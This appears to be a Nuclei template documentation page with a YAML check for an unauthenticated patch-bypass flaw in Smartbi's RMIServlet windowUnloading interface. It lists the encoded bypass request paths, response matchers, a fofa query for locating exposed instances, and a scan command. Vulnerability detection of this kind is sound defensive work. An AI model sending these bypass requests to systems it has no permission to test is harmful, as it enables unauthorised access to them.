Skip to content
Nuclei Templates

Smartbi windowunloading Interface - Deserialization

ID: smartbi-deserialization

Severity: high

Author: SleepingBag945

Tags: smartbi,deserialization

Description

Section titled “Description”

The Smartbi big data analysis platform has a remote command execution vulnerability. An unauthenticated remote attacker can use the stub interface to construct a request to bypass patch restrictions and then control the JDBC URL, which can ultimately lead to remote code execution or information leakage.

YAML Source

Section titled “YAML Source”
id: smartbi-deserialization


info:
  name: Smartbi windowunloading Interface - Deserialization
  author: SleepingBag945
  severity: high
  description: |
    The Smartbi big data analysis platform has a remote command execution vulnerability. An unauthenticated remote attacker can use the stub interface to construct a request to bypass patch restrictions and then control the JDBC URL, which can ultimately lead to remote code execution or information leakage.
  reference:
    - https://stack.chaitin.com/techblog/detail?id=122
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-windowunloading-other.yaml
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="SMARTBI"
  tags: smartbi,deserialization


http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        className=UserService&methodName=isLogged&params=[]


    payloads:
      path:
        - /smartbi/vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54
        - /vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"H~CxOm~"'


      - type: word
        part: header
        words:
          - 'text/plain'


      - type: status
        status:
          - 200
# digest: 490a00463044022039a7f072d8c61321d0c51fdb2f1658439fdf621e82ac29929943fa6c355aba9e02204ae2999567a06b49b837fefce5b3b199bd40cfc6ce9c3cdaf59dfa55c87a4a13:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/smartbi/smartbi-deserialization.yaml"

View on Github